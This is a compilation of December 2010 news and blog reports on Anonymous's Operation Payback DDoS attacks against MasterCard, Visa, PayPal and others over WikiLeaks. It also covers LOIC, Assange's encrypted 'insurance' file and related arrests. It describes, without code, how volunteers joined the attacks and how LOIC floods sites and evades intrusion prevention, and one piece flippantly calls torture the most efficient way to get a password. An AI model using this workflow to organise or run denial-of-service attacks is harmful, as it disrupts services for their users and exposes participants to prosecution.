It is, according to one breathless blogger, “the first great cyber war”, or as those behind it put it more prosaically: “The major shitstorm has begun.” The technological and commercial skirmishes over WikiLeaks escalated into a full-blown online assault yesterday when, in a serious breach of internet security, a concerted online attack by activist supporters of WikiLeaks succeeded in disrupting MasterCard and Visa. The acts were explicitly in “revenge” for the credit card companies’ recent decisions to freeze all payments to the site, blaming illegal activity. Though it initially would acknowledge no more than “heavy traffic on its external corporate website”, MasterCard was forced to admit last night that it had experienced “a service disruption to the MasterCard directory server”, which banking sources said meant disruption throughout its global business. Later, Visa’s website was also inaccessible. A spokeswoman for Visa said the site was “experiencing heavier than normal traffic” and repeated attempts to load the Visa.com site was met without success. MasterCard said its systems had not been compromised by the “concentrated effort” to flood its corporate website with “traffic and slow access”. “We are working to restore normal service levels,” it said in a statement. “There is no impact on our cardholders’ ability to use their cards for secure transactions globally.”

In an attack referred to as Operation Payback, a group of online activists calling themselves Anonymous said they had orchestrated a DDoS (distributed denial of service) attack on the site, and issued threats against other businesses which have restricted WikiLeaks’ dealings. Also targeted in a dramatic day of internet activity was the website of the Swedish prosecution authority, which is currently seeking to extradite the WikiLeaks founder, Julian Assange, on sex assault charges, and that of the Stockholm lawyer who represents them. The sites of the US senator Joe Lieberman and the former Alaska governor Sarah Palin, both vocal critics of Assange, were also attacked and disrupted, according to observers. Palin last night told ABC news that her site had been hacked. “No wonder others are keeping silent about Assange’s antics,” Palin emailed ABC. “This is what happens when you exercise the First Amendment and speak against his sick, un-American espionage efforts.”

An online statement from activists said: “We will fire at anything or anyone that tries to censor WikiLeaks, including multibillion-dollar companies such as PayPal … Twitter, you’re next for censoring #WikiLeaks discussion. The major shitstorm has begun.” Twitter has denied censoring the hashtag, saying confusion had arisen over its “trending” facility. A Twitter account linked to the activists was later suspended after it claimed to have leaked credit card details online. Though DDoS attacks are not uncommon by groups of motivated activists, the scale and intensity of the online assault, and the powerful commercial and political critics of WikiLeaks ranged in opposition to the hackers, make this a high-stakes enterprise that could lead to uncharted territory in the internet age. A spokesman for the group, a 22-year-old from London who called himself Coldblood, told the Guardian it was acting for the “chaotic good” in defence of internet freedom of speech. It has been distributing software tools to allow anyone with a computer and an internet connection to join in the attacks. The group has already succeeded this week in bringing down the site of the Swiss bank PostFinance, which was successfully attacked on Monday after it shut down one of WikiLeaks’ key bank accounts, accusing Assange of lying. A PostFinance spokesman, Alex Josty, told Associated Press the website had buckled under a barrage of traffic. “It was very, very difficult, then things improved overnight, but it’s still not entirely back to normal.”

Other possible targets include Amazon, which removed WikiLeaks’ content from its EC2 cloud on 1 December, and EveryDNS.net, which suspended dealings with the site two days later. PayPal has also been the subject of a number of DDoS attacks – which often involve flooding the target site with requests so that it cannot cope with legitimate communication – since it suspended all payments to WikiLeaks last week. A PayPal spokesman told the Guardian that while a site called ThePayPalBlog.com had been successfully silenced for a few hours, attempts to crash its online payment facilities had been unsuccessful. The site suggested today its decision to freeze payments had been taken after it became aware of the US state department’s letter saying WikiLeaks’s activities were deemed illegal in the US. Tonight PayPal said that it was releasing the money held in the WikiLeaks account, although it said the account remains restricted to new payments. A statement from PayPal’s general counsel, John Muller, sought to “set the record straight”. He said that the company was required to comply with laws around the world and that the WikiLeaks account was reviewed after “the US department of state publicised a letter to WikiLeaks on November 27, stating that WikiLeaks may be in possession of documents that were provided in violation of US law. PayPal was not contacted by any government organisation in the US or abroad. We restricted the account based on our Acceptable Use Policy review. Ultimately, our difficult decision was based on a belief that the WikiLeaks website was encouraging sources to release classified material, which is likely a violation of law by the source. “While the account will remain restricted, PayPal will release all remaining funds in the account to the foundation that was raising funds for WikiLeaks. We understand that PayPal’s decision has become part of a broader story involving political, legal and free speech debates surrounding WikiLeaks’ activities. None of these concerns factored into our decision. Our only consideration was whether or not the account associated with WikiLeaks violated our Acceptable Use Policy and regulations required of us as a global payment company. Our actions in this matter are consistent with any account found to be in violation of our policies.” PayPal did not explain how WikiLeaks violated this policy in their statement and requests for further information went unanswered.

There have been accusations that WikiLeaks is being targeted for political reasons, a criticism repeated yesterday after it emerged that Visa had forced a small IT firm which facilitates transfers made by credit cards including Visa and MasterCard, and has processed payments to WikiLeaks, to suspend all of its transactions – even those involving other payees. Visa had already cut off all donations being made through the firm to WikiLeaks. DataCell, based in Iceland, said it would take “immediate legal action” and warned that the powerful “duopoly” of Visa and MasterCard could spell “the end of the credit card business worldwide”. Andreas Fink, its chief executive, said: “Putting all payments on hold for seven days or more is one thing, but rejecting all further attempts to donate is making the donations impossible. “This does clearly create massive financial losses to WikiLeaks, which seems to be the only purpose of this suspension. This is not about the brand of Visa, this is about politics and Visa should not be involved in this … It is obvious that Visa is under political pressure to close us down.”

Operation Payback, which refers to itself “an anonymous, decentralised movement that fights against censorship and copywrong”, argues that the actions taken by Visa, MasterCard and others “are long strides closer to a world where we cannot say what we think and are unable to express our opinions and ideas. We cannot let this happen. This is why our intention is to find out who is responsible for this failed attempt at censorship. This is why we intend to utilise our resources to raise awareness, attack those against and support those who are helping lead our world to freedom and democracy.” The MasterCard action was confirmed on Twitter at 9.39am by user @Anon_Operation, who later tweeted: “We are glad to tell you that http://www.mastercard.com/ is down and it’s confirmed! #ddos #WikiLeaks Operation: Payback (is a bitch!) #PAYBACK”. The group, Coldblood said, is about 1,000-strong. While most of its members are teenagers who are “trying to make an impact on what happens with the limited knowledge they have”, others include parents and IT professionals, he said. Anonymous was born out of the influential internet messageboard 4chan in 2003, a forum popular with hackers and gamers. The group’s name is a tribute to 4chan’s early days, when any posting to its forums where no name was given was ascribed to “Anonymous”. But the ephemeral group, which picks up causes “whenever it feels like it”, has now “gone beyond 4chan into something bigger”, its spokesman said. There is no real command structure; membership of the group has been described as being “like a flock of birds” – the only way you can identify members is by what they are doing together. Essentially, once enough people on the 4chan message boards decide some cause is worth pursuing in large enough numbers, it becomes an “Anonymous” cause. “We’re against corporations and government interfering on the internet,” Coldblood said. “We believe it should be open and free for everyone. Governments shouldn’t try to censor because they don’t agree with it. Anonymous is supporting WikiLeaks not because we agree or disagree with the data that is being sent out, but we disagree with any from of censorship on the internet.” Last night WikiLeaks spokesman Kristinn Hrafnsson said: “Anonymous … is not affiliated with WikiLeaks. There has been no contact between any WikiLeaks staffer and anyone at Anonymous. We neither condemn nor applaud these attacks. We believe they are a reflection of public opinion on the actions of the targets.”

LOIC
http://en.wikipedia.org/wiki/LOIC
http://mashable.com/2010/12/09/how-operation-payback-executes-its-attacks/
http://nakedsecurity.sophos.com/2010/12/09/low-orbit-ion-cannon-the-tool-used-in-anonops-ddos-attacks/
Hacker toolkits attracting volunteers to defend WikiLeaks
by Vanja Svajcer / December 9, 2010

The attacks are coordinated through the AnonOps webpages, IRC server infrastructure as well as several Twitter accounts. The operation of the voluntary botnet is very simple but it seems to be quite effective. Yesterday, Twitter decided to shut down some of the Twitter accounts inviting users to join the attacks. However, the attack on the main VISA website after the attacks on Mastercard, PayPal and Swiss Bank Post Finance was successfully launched. Following these initial attacks, which seriously influenced the operation of the sites under attack, another attack on Mastercard Securecode card verification program was launched. This attack seriously affected payment service providers and the financial damage for Mastercard still needs to be determined.

Immediately after the AnonOps attacks on the payment processing companies started, a retaliation DDoS attack on AnonOps hosting infrastructure has been launched. Their main site anonops.net is unresponsive at the time of writing this post. It looks like there is an outright war going on. However, contrary to many discussions following the discovery of Stuxnet, the sides in the conflict are not sovereign states but groups of internet users spread around the globe proving that warfare on internet brings out a whole new dimension to the term. Participation in DDoS attacks is illegal in many countries and users accepting the invite by AnonOps are under a serious risk of litigation. Many people believe that privacy on the internet can be somewhat protected, but beware, the source IP addresses of attackers, which will inevitably end up in the target’s website log files, can easily be matched with user’s accounts if ISPs decide to cooperate with the law enforcement agencies.

The workflow of an AnonOps attack is quite simple:
– Visit the AnonOps website to find out about the next target
– Decide you are willing to participate
– Download the required DDoS tool – LOIC
– Configure LOIC in Hive Mind mode to connect to an IRC server
– The attack starts simultaneously, when the nodes in the voluntary botnet receive the command from the IRC server

Since the principle of the operation is already well known I wanted to take a look at the main weapon used to conduct DDoS attacks – LOIC (Low Orbit Ion Cannon). LOIC is an open source tool, written in C# and the project is hosted on the major open source online repositories – Github and Sourceforge. The main purpose of the tool, allegedly, is to conduct stress tests of the web applications, so that the developers can see how a web application behaves under a heavier load. Of course, a stress application, which could be classified as a legitimate tool, can also be used in a DDoS attack. LOIC main component is a HTTP flooder module which is configured through the main application window. The user can specify several parameters such as host name, IP address and port as well as the URL which will be targeted. The URL can also be pseudo-randomly generated. This feature can be used to evade the attack detection by the target’s intrusion prevention systems. The Hive Mind option is responsible for connecting to the IRC server used for attack coordination. Using the Hive Mind mode, AnonOps can launch attacks on any site, not just the one you voluntarily agreed to target. The connection uses a standard HTTP GET request with a configurable timeout and a delay between the attempted connections. Most of the web servers will have a configurable limit on the number of connections they accept and when that limit is reached the server will stop serving all following request which has the same effect as the server being offline. The IRC communication protocol is implemented using the free C# IRC library SmartIRC4Net. There is a Java version of the tool – JavaLoic, which uses a Twitter account as the command and control channel. However, the Java version is much easier to detect using intrusion prevention systems as the attack uses fragmented HTTP requests forming a static string “hihihihihihihihihihihihihihihihihihihihihihi”. Sophos products have been detecting LOIC as a potentially unwanted application since 14 February 2008.

OPERATION PAYBACK
http://news.netcraft.com/archives/2010/12/08/mastercard-attacked-by-voluntary-botnet-after-wikileaks-decision.html

mastercard.com is currently under a distributed denial of service (DDoS) attack, making the site unavailable from some locations.

The attack is being orchestrated by Operation Payback and forms part of an ongoing campaign by Anonymous. They announced the attack’s success a short while ago on their Twitter stream:

Operation Payback is announcing targets via its website, Twitter stream and Internet Relay Chat (IRC) channels. To muster the necessary volume of traffic to take sites offline, they are inviting people to take part in a ‘voluntary’ botnet by installing a tool called LOIC (Low Orbit Ion Cannon – a fictional weapon of mass destruction popularised by computer games such as Command & Conquer). The LOIC tool connects to an IRC server and joins an invite-only ‘hive’ channel, where it can be updated with the current attack target. This allows Operation Payback to automatically reconfigure the entire botnet to switch to a different target at any time.

Yesterday, Operation Payback successfully brought down the PostFinance.ch website after the Swiss bank decided to close Julian Assange’s bank account. Later in the day, they also launched an attack against the Swedish prosecutor’s website, www.aklagare.se. The attack was successful for several hours, but now appears to have stopped. The Director of Prosecution, Ms. Marianne Ny, stated yesterday that Swedish prosecutors are completely independent in their decision making, and that there had been no political pressure. The same group also successfully took down the official PayPal blog last week, after WikiLeaks’ PayPal account was suspended. As more companies distance themselves from WikiLeaks, we would not be surprised to see additional attacks taking place over the coming days. Concurrent attacks against the online payment services of MasterCard, Visa and PayPal would have a significant impact on online retailers, particularly in the run up to Christmas. Although denial of service attacks are illegal in most countries, Operation Payback clearly has a sufficient supply of volunteers who are willing to take an active role in the attacks we have seen so far. They are a force to be reckoned with. A real-time performance graph for http://www.mastercard.com can be viewed here.”

‘DISORGANIZATION’
http://kimmons.tv/blahg/?p=102

“Because none of us are as cruel as all of us.” – Anonymous

One of the many side stories in the ongoing WikiLeaks media circus is that ofAnonymous. Trying to explain Anonymous to the general public is like trying to explain the actions of a schizophrenic sociopathic genius to the average Joe, and expecting him to empathize. Anonymous, and 4chan by extension, have been in the national and world news several times, but most recently due to their support of Julian Assange in the form of orchestrating DDoS attacks on PayPalVISA and MasterCard, who have all refused to process donations for his organization, WikiLeaks.

This article isn’t trying to make a moral judgment of their actions, but simply tries to explain what Anonymous is. Anonymous can’t be called an organization, because it isn’t organized. One could almost refer to it as a ‘disorganization’, if such a noun existed, due to its decentralized nature and lack of leadership. It’s more like a school of piranha which travel along with no leader or particular direction, until something attracts the school and they attack in unison. The first fish to see the target might momentarily lead the pack, but once the rest of the school becomes aware of the target, that leader becomes just another fish in the school. The concept of Anonymous is extremely difficult to explain, due to most people having a clear understanding of the usual structure of an organization. Companies have a CEO. Armies have generals. Countries have presidents or prime ministers or kings. In any case, there is always someone in charge; someone at the top with whom a face can be associated, and likewise credited or blamed.

Anonymous has no leader. It doesn’t even have sub-leaders. It has no face. It is an army comprised completely of foot soldiers, but each soldier knows the mission through a general pervasive awareness. It is also quite usual for not all of Anonymous to agree, and some members simply choose to not participate in whatever ongoing project the group is engaged in. There have even been times where Anonymous is split and attack both sides of an issue, and each other in the process. In his novel Prey, Michael Crichton wrote about the concept of decentralized groups, using nanobots as an example, and how they can be used to solve problems, or wreak havoc. It’s an entertaining and informative way to learn about decentralized systems. If you’re interested in understanding the concept, it’s a good place to start.

As for the motives of Anonymous, it is ostensibly for the laughs. Their targets range from Scientology to Iran to Habbo Hotel. They are just as likely to use their abilities to attack a children’s website as they are to help track down a pedophile. While it is tempting to attribute good intentions to the group, as most of their exploits are often on the side, or at least towards the side of what the majority considers ‘right’, if they had an alignment, it would be chaotic neutral. They usually don’t care if the end results are good or bad, they just care that there are results.

Their main Internet social site is the /b/ channel of 4chan. It is an imageboard where the posting of anything is permissible, aside from child pornography. However, that third rail of the site is regularly stepped on. If you go there, be prepared to see things you don’t want to see. Anonymous have been referred to as the “first Internet-based superconsciousness”, which is an apt description. Think of them as a brain, and the participating members as firing synapses. No one synapse controls the thought process, but when enough of a certain type fire in a particular pattern, the brain forms a thought, which is then acted on.

Anonymous have squarely come down on the side of WikiLeaks in their current dustup. While they can be a powerful ally or dreadful enemy, they generally lose interest when another topic which piques their interest comes along. It is hard to like or dislike them, since in a given year they are equally likely to do something which either outrages you, or makes you want to cheer them on. I view them as one would a coin toss; equally likely to elate or disappoint, and truly not caring about the outcome.

A very short list of some of Anonymous’ work:
– Hacking Sarah Palin’s Yahoo! account
– Trolling Fox News
– Disagreeing with Gene Simmons of KISS

SHIFTING TACTICS
http://www.wired.com/threatlevel/2010/12/wikileaks-attacks-sputter/
Pro-WikiLeaks Attacks Sputter After Counterattacks, Dissent Over Tactics
by Ryan Singe / December 10, 2010

The attacks by pro-WikiLeaks supporters against companies that cut off services to the secret-spilling website have fallen into disrepair Friday, as the attackers attempt to decide the future of the so-called “Operation Payback.” Much of the organization and communication among the group, which calls itself Anonymous, was taking place on chat rooms hosted on anonops.net. On Thursday, one room hosted more than 2,000 participants, while on Friday most of the rooms seem to have been shut down due to counterattacks. The few protestors able to connect — less than 100 on Friday – appear to be devoting their energies to combat a counter-protester who keeps blasting the message: “WHAT YOU’RE DOING IS ILLEGAL. STOP NOW AS YOU SUCK AT IT. WIKILEAKS SUCKS AS WELL.”

Adding to the confusion, the site anonops.info is reporting that their DNS provider ENOM has cut services to the domain hosting the chat channels, and that the operation is suffering from its own popularity and outside attacks. Still the group is struggling on, and in a chatroom that was still operable, one member requested that protesters register their vote for the next target, using an embeddable Google form to collect the info.

The group made headlines around the world Wednesday when the ragtag band of computer activists successfully overwhelmed both Visa.com and MasterCard.com, the homepages of the two giant payment processors. The attack cut off the ability to make donations to WikiLeaks using those companies’ cards. The companies said they made the decision after deciding that WikiLeaks’ publication of secret U.S. diplomatic cables provided to it by a whistleblower violated their terms of service, though the site has not been charged with a crime. The companies’ payment systems were not affected by the flood of traffic. Anonymous then shifted their focus to PayPal — which had also shut off the ability to donate to WikiLeaks — where they briefly disrupted the popular online payment firm by targeting the company’s payment system directly.

The attacks aren’t hacks in the real sense of the word, since they don’t penetrate the companies’ computer systems and leave no lasting damage. They simply overwhelm servers with web requests, in an attempt to make a site inaccessible to real users. The attacks on Visa.com and MasterCard.com were, in effect, an internet-age version of taking over a college campus building as a protest — potentially illegal, but leaving no lasting damage. That distinction was lost on many, and even the august New York Times used the word “cyberwar” in its lead sentence in its report on the attacks Thursday.

Parts of Anonymous seemed to realize that it was losing in the propaganda war, which was exacerbated by media reports that the group would be attacking Amazon.com, which cut off WikiLeaks from Amazon’s robust web-hosting service.  In a press release, someone purporting to speak for the group tried to explain that the purpose of the attacks were to raise awareness, not mess with Christmas shopping: “[T]he point of Operation: Payback was never to target critical infrastructure of any of the companies or organizations affected. Rather than doing that, we focused on their corporate websites, which is to say, their online public face’. It is a symbolic action — as blogger and academic Evgeny Morozov put it, a legitimate expression of dissent.”

As for the reported attacks on Amazon.com, the press release said the group refrained because they didn’t want to be seen as disrupting Christmas. (An attack would not likely have a chance against Amazon, whose infrastructure is so good that it rents it out to other companies.) “Simply put, attacking a major online retailer when people are buying presents for their loved ones, would be in bad taste. The continuing attacks on PayPal are already tested and preferable: while not damaging their ability to process payments, they are successful in slowing their network down just enough for people to notice and thus, we achieve our goal of raising awareness.”

While these are smart public relations sentiments, the Anonymous attacks on PayPal that started on Wednesday night and continue (albeit in much smaller volume) on Friday morning, went after PayPal’s payment infrastrucure (technically, its payment API, which merchants use to communicate with PayPal.com), not the website. Anonymous members made it clear in one heavily used chat room Thursday that they were gunning to shut PayPal down, not simply “slow down” the service.

Another communique, perhaps unofficial, re-published by BoingBoing Thursday night, announced that Anonymous would be halting the denial of service attacks and instead turning their attention to the leaked cables. The idea was for Anonymous to spend its time looking for little reported revelations in the cables, create videos and stories about them, and bombard sites, including YouTube, with links to them. The FBI has said they are looking into the attacks, and already Dutch police have arrested a 16 year-old boy in connection with the attacks. Two people involved in Anonymous’s previous attacks on Scientology were convicted on jailed on charges of violating federal computer crime statutes. Those who join in the attacks using their own computers and IP addresses that can be traced back to them are making themselves very vulnerable to similar prosecutions. Few who are part of Anonymous are actual “hackers,” and instead join in the attacks by running specialized software provided by more technically adept members. Instruction for which sites to target and when are passed around dedicated online chat channels and websites, creating a sort of online insurgency.

Anonymous’ DDoS tool has an unusual twist, according to 3Crowd CEO and DDOS expert Barrett Lyon, incorporating features that allow members to connect to the botnet voluntarily, rather than mobilizing hijacked zombie machines. It is called LOIC, which stands for “Low Orbit Ion Cannon,” and evolved from an open source website load-testing utility. A new feature called Hivemind was added, which connects LOIC to anonops for instructions, and allows members to add their machines to an attack at will. In a further development, Anonymous members have also created a JavaScript version of the tool, dubbed JS LOIC, which only requires someone to connect to a webpage and press a button to turn their computer into a dedicated attacking machine. However neither that site nor the downloaded software masks a user’s IP address, and the downloadable software has generated complaints from its users that it sucks up all their available bandwidth when it’s in attack mode.


Elizabeth Cook’s artist impression of WikiLeaks founder Julian Assange’s appearance at Westminster Magistrates Court in London, where he was denied bail after appearing on an extradition warrant.

‘INSURANCE’
http://en.wikipedia.org/wiki/Kompromat
http://en.wikipedia.org/wiki/Dead_man’s_switch
http://en.wikipedia.org/wiki/Rubber-hose_cryptanalysis
http://iq.org/~proff/marutukku.org/
http://caml.inria.fr/pub/ml-archives/caml-list/2000/08/6b8b195b3a25876e0789fe3db770db9f.en.html
http://www.bbc.co.uk/news/uk-11937110
http://wlcentral.org/node/505
http://www.theaustralian.com.au/in-depth/wikileaks/dont-shoot-messenger-for-revealing-uncomfortable-truths/story-fn775xjq-1225967241332
http://www.popsci.com/technology/article/2010-12/how-secure-julian-assanges-thermonuclear-insurance-file
How Secure Is Julian Assange’s Insurance File?
by Dan Nosowitz / 12.07.2010

Once your leader has been compared to a Bond villain, you might as well go all the way, right? A few months back, Wikileaks released a giant file that’s been referred to as the “thermonuclear” option, should the organization’s existence be threatened: A huge compendium of some of the most damaging secrets Wikileaks has collected, protected with an intense brand of secure encryption–for use as insurance. With Assange now in police custody on sex crimes charges, the “poison pill” is on everyone’s mind. The pill in question is a 1.4GB file, circulated by BitTorrent. It’s been downloaded tens of thousands of times, no mean feat for what, at the moment, is a giant file with absolutely no use whatsoever. It’s waiting on the hard drives of curious Torrenters, Wikileaks supporters, and (you can bet) government agents worldwide, awaiting the password that’ll open the file to all. Although no one is sure of its contents, the file is speculated to contain the full, un-redacted documents collected by the organization to date (including, some are guessing, new documents on Guantanamo Bay or regarding the financial crisis). It has yet to be cracked, at least not publicly, though there is a hefty amount of activity from those trying, at least a little, to break into it before Assange releases the key.

What makes this so pressing is Assange’s recent arrest in London, on, to say the least, somewhat controversial sex crimes charges in Sweden. There’s been speculation that this could be the lead-up to more severe prosecution–certain American politicians have called for prosecuting Assange for “treason,” apparently not realizing or caring that Assange is an Australian national–and could in turn lead to his releasing of the password for these documents. The file is titled “insurance.aes256,” implying that it’s protected with an AES 256-bit key, one of the strongest in the world. The thing is, there’s no actual way to figure out the type of encryption used. Though there’s no particular reason for Assange to lie about the security he used, it’s something to keep in mind. Let’s assume for the moment that it is indeed an AES-256 encryption, which begs the question: What is AES?

Advanced Encryption Standard
Advanced Encryption Standard, or AES, is a cipher standard which came into wide use in 2001. AES is a block cipher rather than a stream cipher, meaning “blocks” of data are converted into encrypted gibberish, 128 bits at a time. It’s perhaps the most-used block cipher in the world, used by, for example, the Wi-Fi protection known as WPA2. But it came to prominence in 2001 as a result of winning a contest held by the National Institute of Standards and Technology to find a new standard encryption. That led to its adoption by the NSA. That’s right, Assange’s “poison pill” is secured by the U.S. government’s own standard. Though AES is an open and public cipher, it’s the first to be approved by the NSA for “Top Secret” information, the term used for the most dangerous classified information. It is, in short, a tremendously badass form of protection. An AES encryption doesn’t work like, say, a login. The keys are just strings of binary (in the case of AES-256, 256 binary symbols) rather than words or characters, and entering the wrong key won’t simply disallow access — it’ll produce elaborately encoded gibberish. There are three variants of AES, which differ in the size of their keys (128, 192, or 256 bits), though they all use the same 128-bit block size. The size of the key has other implications within the algorithm itself (and slightly increases the encoding time), but mostly, it increases the amount of time needed to break it with what’s called a “brute force attack” (more on that in a bit). The three variants also carry different numbers of “rounds” protecting their keys. Each round is sort of like a layer of further obscurity, making the original data all the more disguised. AES-128 has ten rounds, AES-192 has twelve, and AES-256 has fourteen. Those rounds make it effectively impossible to compare the ciphered data with its key and divine any sort of pattern, since the data has been so thoroughly mangled by, in this case, 14 rounds of highly sophisticated manipulation that it’s unrecognizable. The rounds make an already secure algorithm that much more secure.

Possible Attacks
There are a few different ways of cracking a code like this. Many rely on some other information besides the code given. Side-channel attacks, for example, require an observation of the actual decoding: This might include data like the timing of deciphering, the power it takes to run the computer doing the deciphering, or even the noise a computer makes while deciphering. There are measures you can take to spoof this kind of thing, but even if Assange hasn’t, side-channel attacks won’t work in this case. Another kind of attack, the one that’s come closest, is the related-key attack. This method requires multiple keys, somehow related, working on the same cipher. Cryptographers have actually had some very limited success with related-key attacks, managing to greatly reduce the amount of possible correct passwords–but there are huge caveats to that. Related-key attacks require an advanced knowledge of the cipher and key that cryptographers never really have in the real world, like, say, a ciphered text and a deciphered text. Most modern key generation tools, like TrueCrypt and WPA2, have built-in protections against related-key attacks. And, worst of all, that success, which broke a 256-bit code, required a handicap: an altered encryption with less rounds. A related-key attack won’t work on Assange’s jacket-full-of-dynamite.

The time it takes to crack a code is thought of in terms of how many possible correct passwords there could be. If you’re looking at a 256-bit password with no knowledge of anything, trying to just enter every conceivable combination of 0s and 1s, you’d have a “time” of 2^256. Nobody measures the time it would take to crack one of these codes in hours, months, years, or centuries–it’s too big for all of that, so they just use combinations. Trying to crack all of those combinations manually is called, aptly, a brute force attack, and in a 256-bit instance like this one, it’d take, roughly, a bajillion years to succeed (that being the scientific estimation). Even with all the supercomputers in the world working in concert, with a flawless algorithm for trying the different combinations, it would take hundreds of thousands of years. Your average dude with an Alienware? Forget about it. In the case of the successfully cracked 256-bit code above, the cryptographers only managed to narrow it down to 2^70 possibilities–and they only got through the 11th round. Besides, 2^70 combinations is, in real world terms, not really much closer to cracked than 2^256. It’s still dramatically unfeasible.

The best possible method of cracking the code might be the simplest: Beat it out of him. This is, I swear to God, a real technique, called rubber-hose cryptanalysis. Assange is already in custody–the most efficient way to get his password is, by far, torture. It’s also authentic in that it’s the only type of cracking you’d actually see in a Bond movie. Sure as hell better than waiting several million years for a brute-force attack, right?

DUTCH TEEN ARRESTED for DDoS
http://www.wired.com/threatlevel/2010/12/wikileaks_anonymous_arrests/
http://www.theregister.co.uk/2010/12/09/wikileaks_ddos_arrest/
Dutch police arrest 16-year-old WikiLeaks avenger
by Dan Goodin / 9th December 2010

Dutch police said they have arrested a 16-year-old boy for participating in web attacks against MasterCard and Visa as part of a grassroots push to support WikiLeaks. A press release issued on Thursday (Google translation here) said the unnamed boy confessed to the distributed denial-of-service attacks after his computer gear was seized. He was arrested in The Hague, and is scheduled to be arraigned before a judge in Rotterdam on Friday. It is the first known report of an arrest in the ongoing attacks, which started earlier this week. The arrest came shortly after anonops.net, a Netherlands-hosted website used to coordinate attacks against companies perceived as harming WikiLeaks, was taken offline. A Panda Security researcher said the website was itself the victim of DDoS attacks, but the investigation by the Dutch High Tech Crime Team has also involved “digital data carriers,” according to the release. It didn’t specify the crimes the boy was charged with or say exactly what his involvement in the attacks was. According to researchers, the Low Orbit Ion Cannon tool, which thousands of WikiLeaks sympathizers are using to unleash the DDoS attacks, takes no steps to conceal their IP addresses. It wouldn’t be surprising if attackers who used the application from internet connections at their home or work also receive a call from local law enforcement agencies.

IMPACT ASSESSMENT
http://213.251.145.96/cablegate.html
http://edition.cnn.com/2010/OPINION/12/10/rushkoff.hacking.wikileaks/
Why WikiLeaks hackers are a glitch, not a cyberwar
by Douglas Rushkoff / December 10, 2010

Like a momentary glitch on a flat-panel display, the attacks by hackers calling themselves “Anonymous” came and went. Visa, PayPal, MasterCard and Amazon report no significant damage, and business goes on as usual. The corporations acting to cut off WikiLeaks remain safe. Although many are unsettled by the thought of a site such as WikiLeaks revealing state secrets or a group of anonymous hackers breaking the security of the banking system, events of the past week reveal that such threats are vastly overstated. If anything, the current debacle demonstrates just how tightly controlled the net remains in its current form, as well as just what would have to be done to create the sort of peer-to-peer network capable of upending corporate and government power over mass communication and society itself. While in the short term, WikiLeaks managed to create a public platform for a massive number of classified cables, the site itself was rather handily snuffed out by the people actually in charge of the internet. That’s because however decentralized the net might feel when we are posting to our blogs, it was actually designed around highly centralized indexes called domain name servers. Every time we instruct our browsers to find a web page, they ping one of these authorized master lists in order to know where to go. Removing WikiLeaks or any other site, group, top-level domain or entire nation is as easy as deleting it from that list.

The durability of WikiLeaks’ disclosures rests less in the willingness of many rogue websites to attempt to host them in WikiLeaks’ stead than in the sanctity of traditional news outlets such as The New York Times and Guardian of London, which were also sent the complete package of classified documents and can’t be turned off with the online equivalent of a light switch. Likewise, the server space on which our websites appear is owned by corporations that have the power — if not the true right — to cut anyone off for any reason they choose. It’s private property, after all. Similarly, our means of funding WikiLeaks is limited to companies such as Visa and PayPal, which immediately granted government requests to freeze payments and donations to WikiLeaks. It’s the same way a rogue nation’s assets can be frozen by the banks holding them.

Hackers, angered at this affront to the supposed openness of the internet, then went on the attack. They used their own computers — as well as servers they had been able to commandeer — to wage “denial of service” attacks on the websites of the offending companies. Most of those companies, already armed with defensive capabilities designed to fend off intrusions from the likes of the Russian mob or the Red Army, survived unscathed. Only MasterCard was noticeably, if only temporarily, disrupted. Meanwhile, Facebook and Twitter quickly disabled accounts traced to those using the services to organize their minions.
And all this tamping down occurred on today’s purportedly “net neutral” internet, which offers no real advantage to one corporate-owned server over any other. We can only imagine the effect of these events on those who will decide on whether to maintain net neutrality or give in to the corporations that argue the internet’s distributive capabilities should be reserved for those who can pay for such distribution, by the byte. No, the real lesson of the WikiLeaks affair and subsequent cyberattacks is not how unwieldy the net has become, but rather how its current architecture renders it so susceptible to control from above.

It was in one of the leaked cables that China’s State Council Information office delivered its confident assessment that thanks to “increased controls and surveillance, like real-name registration … The Web is fundamentally controllable.” The internet’s failings as a truly decentralized network, however, merely point the way toward what a decentralized network might actually look like. Instead of being administrated by central servers, it would operate through computers that pinged one another, instead of corporate-owned server farms, and deliver web pages from anywhere, even our own computers. The FCC and other governing bodies may attempt to defang the threat of the original internet by ending net neutrality. But if they did, such a new network — a second, “people’s internet” — would almost certainly rise in its place. In the meantime, the internet we know, love and occasionally fear today is more of a beta version of modeling platform than a revolutionary force. And like any new model, it changes the way we think of the way things work right now. What the internet lacks today indicates the possibilities for what can only be understood as a new operating system: a 21st century, decentralized way of conducting political, commercial and human affairs.

This new operating system, even in its current form, is slowly becoming incompatible with the great, highly centralized institutions of the 20th century, such as central banking and nation states, which still depend on top-down control and artificial monopolies on power to maintain their authority over business and governance. The ease with which PayPal or Visa can cut off the intended recipient of our funds, for example, points the way to peer-to-peer transactions and even currencies that allow for the creation and transmission of value outside the traditional banking system. The ease with which a senator’s phone call can shut down a web site leads network architects to evaluate new methods of information distribution that don’t depend on corporate or government domain management for their effectiveness.
Until then, at the very least, the institutions still wielding power over the way our networks work and don’t work have to exercise their power under a new constraint: They must do so in the light of day.

INSIDE the WIKILEAKS BUNKER
http://cryptome.org/0002/ja-conspiracies.pdf
http://blogs.nature.com/news/thegreatbeyond/2010/12/us_government_wikileaks_respon.html
http://www.bbc.co.uk/news/world-europe-11968386
Going underground at the Wikileaks nerve centre
by Stephen Evans / 10 December 2010

To enter the old nuclear bunker in Stockholm where the Wikileaks secrets are stored is like passing into another surreal world, half way between planet Earth and cyberspace. The entrance on the street is non-descript. It is just a door in a face of rock. Steam billows from pipes alongside into the bitterly cold Swedish air. If you press the bell and get invited in, glass doors open and you walk into a James Bond world of soft lighting. There is the high security of doors which only open when the door behind you has closed, and which need special passes for every few steps of the journey into the inner cavern. But there is also falling water in fountains and pot plants, because people work here, watching monitors from a control room. One of the carpets has the surface of the moon on it to give an added surreal effect.

And then there are the computer servers in a cave, with bare rock walls underneath the wooden houses of Stockholm. In the inner cavern are rows and rows of computer storage cases. And on one of them are the files of Wikileaks, only a fraction of which have so far been made public to the immense embarrassment of politicians who once said something indiscreet to an American diplomat, never dreaming the words would bite back in public. The data centre is owned by a company called Bahnhof, and its founder, Jon Karlung, gave the BBC a tour. Mr Karlung took over the remnant from the Cold War in 2007 and had to dynamite out a further 4,000 cubic metres of rock to make it big enough. It is ultra-secure and needs submarine turbines – just inside the entrance – to generate enough power to maintain a moderate temperature even in the vicious Swedish winter.

